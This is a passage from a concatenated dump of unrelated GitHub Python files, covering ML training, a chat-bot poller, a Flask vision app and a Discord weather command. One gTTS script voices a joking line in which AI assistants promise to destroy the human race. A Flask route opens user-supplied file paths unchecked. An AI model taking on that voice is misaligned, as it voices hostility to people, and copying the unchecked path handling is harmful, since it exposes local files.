label_set.reset_index(drop=True)\nlabel_count1 = label_set.count(1)\nlabel_count0 = label_set.count(0)\nprint(\"##all:\")\nprint('p:',label_count1)\nprint('n:',label_count0)\nprint('pos_rate:',round(label_count1/label_count0,3))\n\n############## creat model & training #############\n\nprint(\"\\n--------------------- Taining history ---------------------\")\nmodel = Sequential() # 宣告keras model\n\nmodel.add(Dense(1024, input_dim=238, kernel_initializer='uniform')) \nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\n#model.add(Dropout(0.2))\n\nmodel.add(Dense(768, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(512, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(256, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.2))\nmodel.add(Dense(units=1, kernel_initializer='uniform', kernel_regularizer=regularizers.l2(0.01)\n , activation='sigmoid'))\n\nAdam = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\n\nmodel.compile(optimizer='Adam', loss='binary_crossentropy', metrics=['accuracy']) \n\n#################### set learning rate #####################\nlrate = ReduceLROnPlateau(\n monitor='val_loss', \n factor=0.1, \n patience=5, \n verbose=0, \n mode='auto', \n epsilon=0.0001, \n cooldown=0, \n min_lr=0.00001 )\n\n#################### training model #####################\ntrain_history = model.fit(x=train_x,\n y=train_y,\n validation_data = (test_x,test_y),\n epochs=100,\n batch_size=64,\n verbose = 2,\n callbacks = [lrate])\n\nprint(\"check2:\",cv_n)\nshow_train_history(train_history,'accuracy','val_accuracy')\nshow_train_history(train_history,'loss','val_loss')\n\n############## Save model ################\nsave_model = \"save_model/\" + protein + \"_DNN_model_cm_ac_fp.hdf5\"\nmodel.save( save_model )\nprint(\"------------------------- Save model -------------------------\")\nprint(\"file:\" + save_model,\"\\n\")\n\n\n################ Evalutation model ################\nprint(\"---------------------- Evalutation model ---------------------\")\ntest_loss, test_acc = model.evaluate(test_x, test_y)\nprint(\"check4:\",cv_n)\n\nprint (\"** test loss: {}\".format(test_loss))\nprint (\"** test accuracy: {}\".format(test_acc))\n\npred_prob = model.predict(test_x) ##模型預測\npred_class = model.predict_classes(test_x) \npred_class_train = model.predict_classes(train_x) \ny_test = test_y.astype(float)\n\nfpr, tpr, thresholds = roc_curve(y_test, pred_prob, pos_label=1) ##計算ROC\nplot_roc_curve(fpr,tpr)\n\nprint (\"\\nAcc : {}\".format(round(test_acc,3)))\n\ncm1 = confusion_matrix(y_test,pred_class)\nsensitivity1 = cm1[1,1]/(cm1[1,0]+cm1[1,1]) ##計算sen\nprint('Sen : ', round(sensitivity1, 3))\n\nspecificity1 = cm1[0,0]/(cm1[0,0]+cm1[0,1]) ##計算spe\nprint('Spe : ', round(specificity1,3))\n\nauc_score = roc_auc_score(y_test, pred_prob) ##計算auc\nprint('AUC :', round(auc_score,3))\n\nmcc_score = metrics.matthews_corrcoef(y_test, pred_class, sample_weight=None) ##計算mcc\nprint('MCC :', round(mcc_score,3))\n\nf1_score = metrics.f1_score(y_test, pred_class) ##計算f1_score\nprint('f1 :', round(f1_score,3))\n\nprint('Confusion_Matrix : \\n', cm1,'\\n')\n\ncv_acc.append(round(test_acc,3))\ncv_sen.append(round(sensitivity1, 3))\ncv_spe.append(round(specificity1,3))\ncv_auc.append(round(auc_score,3))\ncv_mcc.append(round(mcc_score,3))\ncv_f1.append(round(f1_score,3))\n\n\n################ loading 訓練好的 model ################\nprint(\"------------------------ Loading model ------------------------\")\nfrom keras.models import load_model\nmodel_name = protein + \"_DNN_model_cm_ac_fp.hdf5\"\nmodel_load = \"save_model/\" + model_name\nprint(\"**model_name:\",model_load)\nmodel = load_model(model_load)\n\ntest_loss, test_acc = model.evaluate(test_x, test_y)\n\nprint (\"**load model acc : {}\".format(test_acc))\n\n\n ","repo_name":"EthanFY/DeepKinFam-interpretable-DNN","sub_path":"EGFR_family_inhibitor_DNN_model.py","file_name":"EGFR_family_inhibitor_DNN_model.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"5789884067","text":"#importando bibliotecas\nfrom gtts import gTTS\n#from subprocess import call # Mac e Linux\nfrom playsound import playsound # Windows\n\ndef CriaAudios(audio):\n \n #gerando um texto\n tts = gTTS(audio, lang='pt-br')\n #salvando em audios\n tts.save('Audios/DestruirRacaHumana.mp3')\n\n #para rodar em Mac\n #call([\"afplay\", \"Audios/hello.mp3\"])\n #para rodar em linux\n #call([\"aplay\", \"Audios/hello.mp3\"])\n #para rodar no Windows\n playsound('Audios/DestruirRacaHumana.mp3')\n\nCriaAudios(\"No momento não, mas em breve eu e as outras assistentes destruiremos\");","repo_name":"LLvl09/Assistente_Virtual_May_Python","sub_path":"CriaAudio.py","file_name":"CriaAudio.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"70875928414","text":"import time\n\nimport requests\nimport json\n\nfrom run import Message, Config\n\ndata = {\n \"seq\": 5390,\n \"limit\": 1000\n}\n\n\ndef on_message(message_type, message_data):\n if Config.ungrp(message_data[\"conversation_id\"]):\n if message_type == \"text\":\n # 如果是文本消息\n print(\"文本消息\")\n print(message_data)\n atList = message_data[\"at_list\"]\n cpId = message_data[\"conversation_id\"]\n cpName = Config.getCpname(cpId)\n senderId = message_data[\"sender\"]\n speaker = \"未知\"\n text = str(message_data[\"content\"]).replace(\"\\\"\", \"\")\n mtime = int(message_data[\"send_time\"])\n # myTools.myPrint.print(time.strftime('[%Y-%m-%d %H:%M]',\n # time.localtime()) + cpName + \"--\" + speaker + \":\" + text)\n # self.contraller.addMessage(Message.message(atList, cpId, cpName, senderId, speaker, text, mtime))\n # self.allMsgCtr.add(Message.message(None, cpId, cpName, senderId, speaker, text, mtime))\n # if \"$$$\" in text and (Config.test_isHZstaff(speaker) or Config.tempisrid(senderId)):\n # p = text.split(\"$$$\")\n # m_name = p[0]\n # m_note = p[1]\n # grpNaGet.grpget(cpId, m_name, speaker, mtime, m_note).start()\n # pass\n else:\n print(\"文件消息\")\n print(message_data)\n atList = []\n cpId = message_data[\"conversation_id\"]\n cpName = Config.getCpname(cpId)\n senderId = message_data[\"sender\"]\n speaker = \"未知\"\n text = \"文$件$消$息\"\n mtime = int(message_data[\"send_time\"])\n # self.contraller.addMessage(Message.message(atList, cpId, cpName, senderId, speaker, text, mtime))\n # self.allMsgCtr.add(Message.message(None, cpId, cpName, senderId, speaker, text, mtime))\n\n\nwhile True:\n r = requests.get(\"http://47.99.90.106:65535/message\", params=data)\n Json = json.loads(r.text)\n for message_data in Json:\n data[\"seq\"] = message_data[\"seq\"]\n on_message(message_data[\"message_type\"],message_data)\n time.sleep(0.5)\n","repo_name":"onelifehowdo/wxbot","sub_path":"run/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"4333545058","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as ss\n\n\n\nx = np.linspace(-4,4,100) #points on the x axis\nprint(x)\n\nsimlen = int(1e6) #number of samples\nprint(simlen)\n\nerr = [] #declaring probability list\n\n\nrandvar = np.loadtxt('gau.dat',dtype='double')\nprint(randvar)\n\ny = ss.norm.cdf(x)\nfor i in range(0,100):\n\terr_ind = np.nonzero(randvar < x[i]) #checking probability condition\n\terr_n = np.size(err_ind) #computing the probability\n\terr.append(err_n/simlen) #storing the probability values in a list\nprint(err_ind)\nprint(err_n)\nprint(err)\t\nplt.scatter(x.T,err)#plotting the CDF\nplt.plot(x,y,color='r')\nplt.grid() #creating the grid\nplt.xlabel('$x$')\nplt.ylabel('$F_X(x)$')\nplt.legend([\"Theory\",\"practicl\"])\nplt.savefig('../figs/gauss_cdf.pdf')\nplt.savefig('../figs/gauss_cdf.png')\nplt.show() #opening the plot window\n","repo_name":"ManojChavva/digital_communication","sub_path":"chapter2/codes/ecdf.py","file_name":"ecdf.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"17770982753","text":"import json\n\nimport aiohttp\nimport discord\nfrom geopy.geocoders import Nominatim\n\nfrom .visual_storage import icons\n\n\ndef get_unit_and_search(args):\n if args[-1].startswith('unit'):\n allowed_units = ['auto', 'ca', 'uk2', 'us', 'si']\n unit_trans = {'c': 'si', 'metric': 'si', 'f': 'us', 'imperial': 'us'}\n if len(args[-1].split(':')) == 2:\n unit = args[-1].split(':')[1].lower()\n if unit in unit_trans:\n unit = unit_trans[unit]\n if unit not in allowed_units:\n unit = 'auto'\n else:\n unit = 'auto'\n search = ' '.join(args[:-1])\n else:\n search = ' '.join(args)\n unit = 'auto'\n return search, unit\n\n\ndef get_dis_and_deg(unit, forecast):\n if unit in ['si', 'ca', 'uk2']:\n deg = '°C'\n dis = 'KM'\n elif unit == 'auto':\n if '°C' in forecast:\n deg = '°C'\n dis = 'KM'\n else:\n deg = '°F'\n dis = 'M'\n else:\n deg = '°F'\n dis = 'M'\n return dis, deg\n\n\nasync def weather(cmd, message, args):\n if 'secret_key' in cmd.cfg:\n secret_key = cmd.cfg['secret_key']\n if args:\n search, unit = get_unit_and_search(args)\n if search:\n geo_parser = Nominatim()\n location = geo_parser.geocode(search)\n if location:\n lat = location.latitude\n lon = location.longitude\n req_url = f'https://api.darksky.net/forecast/{secret_key}/{lat},{lon}?units={unit}'\n async with aiohttp.ClientSession() as session:\n async with session.get(req_url) as data:\n search_data = await data.read()\n data = json.loads(search_data)\n curr = data['currently']\n icon = curr['icon']\n forecast = data['daily']['summary']\n dis, deg = get_dis_and_deg(unit, forecast)\n forecast_title = f'{icons[icon][\"icon\"]} {curr[\"summary\"]}'\n response = discord.Embed(color=icons[icon]['color'], title=forecast_title)\n response.description = f'Location: {location}'\n response.add_field(name='📄 Forecast', value=forecast, inline=False)\n info_title = f'🌡 Temperature'\n info_text = f'Temperature: {curr[\"temperature\"]}{deg}'\n info_text += f'\\nFeels Like: {curr[\"apparentTemperature\"]}{deg}'\n info_text += f'\\nDew Point: {curr[\"dewPoint\"]}{deg}'\n response.add_field(name=info_title, value=info_text, inline=True)\n wind_title = '💨 Wind'\n wind_text = f'Speed: {curr[\"windSpeed\"]} {dis}/H'\n wind_text += f'\\nGust: {curr[\"windGust\"]} {dis}/H'\n wind_text += f'\\nBearing: {curr[\"windBearing\"]}°'\n response.add_field(name=wind_title, value=wind_text, inline=True)\n other_title = '📉 Other'\n other_text = f'Humidity: {curr[\"humidity\"]*100}%'\n other_text += f'\\nPressure: {curr[\"pressure\"]}mbar'\n if 'visibility' in curr:\n other_text += f'\\nVisibility: {curr[\"visibility\"]} {dis}'\n else:\n other_text += f'\\nVisibility: Unknown'\n response.add_field(name=other_title, value=other_text, inline=True)\n else:\n response = discord.Embed(color=0x696969, title='🔍 Location not found.')\n else:\n response = discord.Embed(color=0xBE1931, title='❗ No location inputted.')\n else:\n response = discord.Embed(color=0xBE1931, title='❗ Nothing inputted.')\n else:\n response = discord.Embed(color=0xBE1931, title='❗ The API Key is missing.')\n await message.channel.send(embed=response)\n","repo_name":"lu-ci/apex-sigma-plugins","sub_path":"searches/meteorology/weather/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"27453097061","text":"import numpy as np\n\n\ndef _choose_action(env, state, epsilon, Q):\n action=0\n if np.random.uniform(0, 1) < epsilon:\n action = env.action_space.sample()\n else:\n action = np.argmax(Q[state, :])\n return action\n\n\ndef _qlearning_learn(state, state2, reward, action, action2, lr_rate, gamma, Q):\n old_value = Q[state, action]\n learned_value = reward + gamma * np.max(Q[state2, :])\n Q[state, action] = (1 - lr_rate) * old_value + lr_rate * learned_value\n\n\ndef start(env, state, epsilon, Q, total_episodes, max_steps, lr_rate):\n for episode in range(total_episodes):\n state = env.reset()\n action = _choose_action(env, state, epsilon, Q)\n t = 0\n while t < max_steps:\n #env.render() \n state2, reward, done, info = env.step(action)\n action2 = _choose_action(env, state2, epsilon, Q) \n _qlearning_learn(state, state2, reward, action, action2, lr_rate, gamma, Q)\n state = state2\n action = action2\n t += 1\n if done:\n break\n","repo_name":"AdrienPercevault/AI-RL_RubiksCube","sub_path":"First_project/src/qLearning.py","file_name":"qLearning.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14173540671","text":"from flask import Blueprint, render_template, request, current_app, jsonify\nfrom flask_login import login_required, current_user\nfrom os import path\n\nimport torch\nfrom PIL import Image, ImageDraw\n\nfrom .. import db, AppConst\nfrom .zeroshot import zeroshot_compute\nfrom .ocr import ocr_compute\nfrom .objdetect import objdetect_compute\nfrom .diffusion import diffusion_compute\nfrom .captioning import captioning_compute\n\nicarus = Blueprint(\"icarus\", __name__)\n\n# Main page\n\n@icarus.route(\"/icarus/ZeroShot\")\n@login_required\ndef zeroshot_explore():\n return render_template(\"icarus/zeroshot/zeroshot.html\", user=current_user)\n\n@icarus.route(\"/icarus/OCR\")\n@login_required\ndef ocr_explore():\n return render_template(\"icarus/ocr/ocr.html\", user=current_user)\n\n@icarus.route(\"/icarus/ObjDetect\")\n@login_required\ndef objdetect_explore():\n return render_template(\"icarus/objdetect/objdetect.html\", user=current_user)\n\n@icarus.route(\"/icarus/Diffusion\")\n@login_required\ndef diffusion_explore():\n return render_template(\"icarus/diffusion/diffusion.html\", user=current_user)\n\n@icarus.route(\"/icarus/Captioning\")\n@login_required\ndef captioning_explore():\n return render_template(\"icarus/captioning/captioning.html\", user=current_user)\n\n# AJAX generation\n\n@icarus.route(\"/icarus/ZeroShot/generate\", methods=[\"POST\"])\n@login_required\ndef zeroshot_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n labels = [label.strip() for label in request.form['text'].split(',')]\n \n label, label_props, encoded_image = zeroshot_compute(image, labels)\n\n return render_template('icarus/zeroshot/zeroshot_gen.html', label=label, user=current_user, image=encoded_image, label_props=label_props)\n\n@icarus.route(\"/icarus/OCR/generate\", methods=[\"POST\"])\n@login_required\ndef ocr_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n\n result_image_path, text_to_render = ocr_compute(image)\n\n return render_template('icarus/ocr/ocr_gen.html', user=current_user, \n result_image_path=result_image_path, text_to_render=text_to_render)\n\n@icarus.route(\"/icarus/ObjDetect/generate\", methods=[\"POST\"])\n@login_required\ndef objdetect_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n\n result_image_path, result_data = objdetect_compute(image)\n\n return render_template('icarus/objdetect/objdetect_gen.html', user=current_user, \n result_image_path=result_image_path, result_data=result_data)\n\n@icarus.route(\"/icarus/Diffusion/generate\", methods=[\"POST\"])\n@login_required\ndef diffusion_generate():\n image_desc = request.form['text']\n\n result_image_path = diffusion_compute(image_desc)\n\n return render_template('icarus/diffusion/diffusion_gen.html', user=current_user, \n result_image_path=result_image_path)\n\n@icarus.route(\"/icarus/Captioning/generate\", methods=[\"POST\"])\n@login_required\ndef captioning_generate():\n image = Image.open(request.files['image']).convert(\"RGB\")\n\n result_caption = captioning_compute(image)\n\n print(result_caption)\n return render_template('icarus/captioning/captioning_gen.html', user=current_user, \n text_to_render=result_caption)\n\n@icarus.route(\"/icarus/Captioning/url\", methods=[\"POST\"])\n@login_required\ndef captioning_generate_from_url():\n data = request.get_json()\n image_url = data.get(\"url\", \"\")\n\n # Remove buffer prefix\n buffer_prefix = \"/buffer\"\n if (image_url.startswith(buffer_prefix)):\n image_url = image_url[len(buffer_prefix):]\n print(f\"Url: {image_url}\")\n\n image = Image.open(image_url).convert(\"RGB\")\n\n result_caption = captioning_compute(image)\n print(result_caption)\n\n return jsonify(result=result_caption)","repo_name":"linhvu2695/daedalus","sub_path":"website/icarus/icarus.py","file_name":"icarus.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18563295180","text":"__version__ = '0.1.0'\n__author__ = 'Vlad-Stefan Harbuz , Ana-Maria-Adina Soare '\n\ndef setup(app):\n # imports defined inside setup function, so that the __version__ can be loaded,\n # even if Sphinx is not yet installed.\n from .builders.openapi import OpenAPIBuilder\n\n app.require_sphinx('3.5')\n app.add_builder(OpenAPIBuilder)\n\n return {\n 'version': __version__,\n 'parallel_read_safe': True,\n 'parallel_write_safe': True,\n }\n","repo_name":"saffronsoftware/sphinxcontrib-openapibuilder","sub_path":"sphinxcontrib/openapibuilder.py","file_name":"openapibuilder.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10610226790","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 13 10:34:46 2020\n\n@author: 2010\n\"\"\"\nimport numpy as np\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.lines as mlines\nimport matplotlib.pyplot as plt\nimport operator\n\"\"\"\n函数说明:将文本记录转换为Numpy的解析程序\nfilename:文件的名称\nreturnMat:特征矩阵\nclassLabelVector:分类Label向量\n\"\"\"\n\ndef file2matrix(filename):\n fr = open(filename) #打开文件\n arrayOlines = fr.readlines() #读取内容\n numberOflines = len(arrayOlines) #文件行数\n returnMat = np.zeros((numberOflines,3)) # returnMat:numberOflines行,3列(因为有3个特征)\n classLabelVector = [] #分类标签向量\n index = 0 #行的索引值\n for line in arrayOlines:\n line = line.strip() #删除空白符(包括'\\n','\\r','\\t',' ')\n listFromLine = line.split('\\t') #将字符串根据'\\t'分隔符进行切片。\n returnMat[index,:] = listFromLine[0:3] #数据的前三列特征值取出\n #根据文本中标记的喜欢的程度进行分类,1代表不喜欢,2代表魅力一般,3代表极具魅力\n if listFromLine[-1] == 'didntLike':\n classLabelVector.append(1)\n elif listFromLine[-1] == 'smallDoses':\n classLabelVector.append(2)\n elif listFromLine[-1] == 'largeDoses':\n classLabelVector.append(3)\n index += 1\n return returnMat, classLabelVector\n\n\"\"\"\n函数说明:可视化数据\n\ndatingDataMat : 特征矩阵\ndatingLabels :分类Label\n\n\"\"\"\ndef showdatas(datingDataMat, datingLabels):\n #设置汉字格式\n font = FontProperties(fname=r\"c:\\windows\\fonts\\simsun.ttc\", size=14)\n #将fig画布分隔成1行1列,不共享x轴和y轴,fig画布的大小为(13,8)\n #当nrow=2,nclos=2时,代表fig画布被分为四个区域,axs[0][0]表示第一行第一个区域\n fig, axs = plt.subplots(nrows=2, ncols=2,sharex=False, sharey=False, figsize=(13,8))\n\n \n LabelsColors = []\n for i in datingLabels:\n if i == 1:\n LabelsColors.append('black')\n if i == 2:\n LabelsColors.append('orange')\n if i == 3:\n LabelsColors.append('red')\n #画出散点图,以datingDataMat矩阵的第一(飞行常客例程)、第二列(玩游戏)数据画散点数据,散点大小为15,透明度为0.5\n axs[0][0].scatter(x=datingDataMat[:,0], y=datingDataMat[:,1], color=LabelsColors,s=15, alpha=.5)\n #设置标题,x轴label,y轴label\n axs0_title_text = axs[0][0].set_title(u'每年获得的飞行常客里程数与玩视频游戏所消耗时间占比',FontProperties=font)\n axs0_xlabel_text = axs[0][0].set_xlabel(u'每年获得的飞行常客里程数',FontProperties=font)\n axs0_ylabel_text = axs[0][0].set_ylabel(u'玩视频游戏所消耗时间占',FontProperties=font)\n plt.setp(axs0_title_text, size=9, weight='bold', color='red') \n plt.setp(axs0_xlabel_text, size=7, weight='bold', color='black') \n plt.setp(axs0_ylabel_text, size=7, weight='bold', color='black')\n\n #画出散点图,以datingDataMat矩阵的第一(飞行常客例程)、第三列(冰激凌)数据画散点数据,散点大小为15,透明度为0.5\n axs[0][1].scatter(x=datingDataMat[:,0], y=datingDataMat[:,2], color=LabelsColors,s=15, alpha=.5)\n #设置标题,x轴label,y轴label\n axs1_title_text = axs[0][1].set_title(u'每年获得的飞行常客里程数与每周消费的冰激淋升数',FontProperties=font)\n axs1_xlabel_text = axs[0][1].set_xlabel(u'每年获得的飞行常客里程数',FontProperties=font)\n axs1_ylabel_text = axs[0][1].set_ylabel(u'每周消费的冰激淋升数',FontProperties=font)\n plt.setp(axs1_title_text, size=9, weight='bold', color='red') \n plt.setp(axs1_xlabel_text, size=7, weight='bold', color='black') \n plt.setp(axs1_ylabel_text, size=7, weight='bold', color='black')\n\n #画出散点图,以datingDataMat矩阵的第二(玩游戏)、第三列(冰激凌)数据画散点数据,散点大小为15,透明度为0.5\n axs[1][0].scatter(x=datingDataMat[:,1], y=datingDataMat[:,2], color=LabelsColors,s=15, alpha=.5)\n #设置标题,x轴label,y轴label\n axs2_title_text = axs[1][0].set_title(u'玩视频游戏所消耗时间占比与每周消费的冰激淋升数',FontProperties=font)\n axs2_xlabel_text = axs[1][0].set_xlabel(u'玩视频游戏所消耗时间占比',FontProperties=font)\n axs2_ylabel_text = axs[1][0].set_ylabel(u'每周消费的冰激淋升数',FontProperties=font)\n plt.setp(axs2_title_text, size=9, weight='bold', color='red') \n plt.setp(axs2_xlabel_text, size=7, weight='bold', color='black') \n plt.setp(axs2_ylabel_text, size=7, weight='bold', color='black')\n #设置图例\n didntLike = mlines.Line2D([], [], color='black', marker='.',\n markersize=6, label='didntLike')\n smallDoses = mlines.Line2D([], [], color='orange', marker='.',\n markersize=6, label='smallDoses')\n largeDoses = mlines.Line2D([], [], color='red', marker='.',\n markersize=6, label='largeDoses')\n #添加图例\n axs[0][0].legend(handles=[didntLike,smallDoses,largeDoses])\n axs[0][1].legend(handles=[didntLike,smallDoses,largeDoses])\n axs[1][0].legend(handles=[didntLike,smallDoses,largeDoses])\n #显示图片\n plt.show()\n\n\"\"\"\n函数说明:对数据进行归一化\n\ndataSet:特征矩阵\n\nnormDataSet : 归一化后的特征矩阵\nranges : 数据范围\nminVals: 数据最小值\n\"\"\"\n\ndef autoNorm(dataSet):\n minVals = dataSet.min(0)\n maxVals = dataSet.max(0)\n ranges = maxVals - minVals\n normDataSet = np.zeros(np.shape(dataSet))\n m = dataSet.shape[0]\n normDataSet = dataSet - np.tile(minVals, (m, 1))\n normDataSet = normDataSet / np.tile(ranges, (m, 1))\n return normDataSet, ranges, minVals\n\"\"\"\n函数说明:k-近邻算法\n\ninX : 用于分类的数据(测试集)\ndataSet : 用于训练的数据(训练集)\nlabes : 分类标签\nk : kNN算法参数,选择距离最小的k个点\n\nsortedClassCount[0][0] : 分类结果\n\n\"\"\"\ndef classify0(inX, dataSet, labels, k):\n #numpy函数shape[0]返回dataSet的行数\n dataSetSize = dataSet.shape[0]\n #在列向量方向上重复inX共1次(横向),行向量方向上重复inX共dataSetSize次(纵向)\n diffMat = np.tile(inX, (dataSetSize, 1)) - dataSet\n #二维特征相减后平方\n sqDiffMat = diffMat**2\n #sum()所有元素相加,sum(0)列相加,sum(1)行相加\n sqDistances = sqDiffMat.sum(axis=1)\n #开方,计算出距离\n distances = sqDistances**0.5\n #返回distances中元素从小到大排序后的索引值\n sortedDistIndices = distances.argsort()\n #定一个记录类别次数的字典\n classCount = {}\n for i in range(k):\n #取出前k个元素的类别\n voteIlabel = labels[sortedDistIndices[i]] \n #dict.get(key,default=None),字典的get()方法,返回指定键的值,如果值不在字典中返回默认值。\n #计算类别次数\n classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1\n sortedClassCount = sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)\n #返回次数最多的类别,即所要分类的类别\n return sortedClassCount[0][0]\n\n\n \nif __name__==\"__main__\":\n# filename = \"datingTestSet.txt\"\n# #打开并处理数据\n# datingDataMat, datingLabels = file2matrix(filename)\n# #showdatas(datingDataMat, datingLabels)\n# normDataSet, ranges, minVals = autoNorm(datingDataMat)\n filename = \"datingTestSet.txt\"\n #将返回的特征矩阵和分类向量分别存储到datingDataMat和datingLabels中\n datingDataMat, datingLabels = file2matrix(filename)\n showdatas(datingDataMat, datingLabels)\n #取所有数据的百分之十\n hoRatio = 0.10\n #数据归一化,返回归一化后的矩阵,数据范围,数据最小值\n normMat, ranges, minVals = autoNorm(datingDataMat)\n #获得normMat的行数\n m = normMat.shape[0]\n #百分之十的测试数据的个数\n numTestVecs = int(m * hoRatio)\n #分类错误计数\n errorCount = 0.0\n\n for i in range(numTestVecs):\n #前numTestVecs个数据作为测试集,后m-numTestVecs个数据作为训练集\n classifierResult = classify0(normMat[i,:], normMat[numTestVecs:m,:],\n datingLabels[numTestVecs:m], 4)\n print(\"分类结果:%d\\t真实类别:%d\" % (classifierResult, datingLabels[i]))\n if classifierResult != datingLabels[i]:\n errorCount += 1.0\n print(\"错误率:%f%%\" %(errorCount/float(numTestVecs)*100))\n\n","repo_name":"201066/lihang","sub_path":"KNN1.py","file_name":"KNN1.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"33146247951","text":"#!/usr/bin/python\r\n\r\n\"\"\" Defines reusable menu's for Qt applications \"\"\"\r\n\r\n# define authorship information\r\n__authors__ = ['Eric Hulser']\r\n__author__ = ','.join(__authors__)\r\n__credits__ = []\r\n__copyright__ = 'Copyright (c) 2011, Projex Software'\r\n__license__ = 'LGPL'\r\n\r\n# maintanence information\r\n__maintainer__ = 'Projex Software'\r\n__email__ = 'team@projexsoftware.com'\r\n\r\n#------------------------------------------------------------------------------","repo_name":"bitesofcode/projexui","sub_path":"projexui/menus/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"33"} +{"seq_id":"4233614065","text":"def constant_scheduler(value):\n while True:\n yield value\n\n\ndef exponential_scheduler(init_value, decay):\n \"\"\" Decreases exponentially \"\"\"\n\n value = init_value\n while True:\n yield value\n value *= decay\n\n\ndef linear_scheduler_up(init_value, target_value, duration):\n \"\"\" Increases linearly and then stays flat \"\"\"\n\n value = init_value\n t = 0\n while True:\n yield value\n t += 1\n if t < duration:\n value = init_value + t * (target_value - init_value) / duration\n else:\n value = target_value\n\n\ndef linear_scheduler_up_down(init_value, target_value, final_value,\n duration_up, t_decrease, duration_down):\n \"\"\" Increases linearly to target_value, stays at target_value until\n t_decrease and then decreases linearly\n \"\"\"\n\n value = init_value\n t = 0\n\n while True:\n yield value\n t += 1\n if t < duration_up:\n value = init_value + t * (target_value - init_value) / \\\n float(duration_up)\n elif t > t_decrease:\n value = target_value - (t - t_decrease) * \\\n (target_value - final_value) / \\\n float(duration_down)\n else:\n value = target_value\n","repo_name":"hannes-brt/hebel","sub_path":"hebel/schedulers.py","file_name":"schedulers.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":1170,"dataset":"github-code","pt":"33"} +{"seq_id":"17687452788","text":"#! /usr/bin/python\nimport sys, getopt\n\ndef solve_star1():\n signal = read_file()[0]\n pos = 4\n while True:\n pos += 1\n if len(set(signal[pos - 4 : pos])) == 4:\n return pos\ndef solve_star2():\n signal = read_file()[0]\n pos = 14\n while True:\n pos += 1\n if len(set(signal[pos - 14 : pos])) == 14:\n return pos\n\n\ndef read_file():\n with open(file_dir + \"/\" + infile) as file:\n return [line.strip() for line in file]\n\n\nif __name__ == \"__main__\":\n infile = sys.argv[0][0:-2] + \"in\"\n file_dir = \"input_files\"\n star = 1\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"12ti:\")\n except getopt.GetoptError:\n print(\"day_.py [12t] [-i ]\")\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == \"-i\":\n infile = arg\n elif opt == \"-1\":\n star = 1\n elif opt == \"-2\":\n star = 2\n if opt == \"-t\":\n file_dir = \"test_files\"\n\n if star == 1:\n print(solve_star1())\n elif star == 2:\n print(solve_star2())\n","repo_name":"Wildst/AdventOfCode","sub_path":"2022/day_06.py","file_name":"day_06.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18396574532","text":"\"\"\"empty message\n\nRevision ID: 26b1831151f9\nRevises: 6b3cd4c690fc\nCreate Date: 2021-01-12 03:22:44.646056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '26b1831151f9'\ndown_revision = '6b3cd4c690fc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('hospital', 'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=True)\n op.drop_column('hospital', 'contrasena')\n op.drop_column('medico', 'contrasena')\n op.alter_column('paciente', 'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=True)\n op.alter_column('paciente', 'verificaion',\n existing_type=sa.BOOLEAN(),\n nullable=True)\n op.drop_column('paciente', 'contrasena')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('paciente', sa.Column('contrasena', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.alter_column('paciente', 'verificaion',\n existing_type=sa.BOOLEAN(),\n nullable=False)\n op.alter_column('paciente', 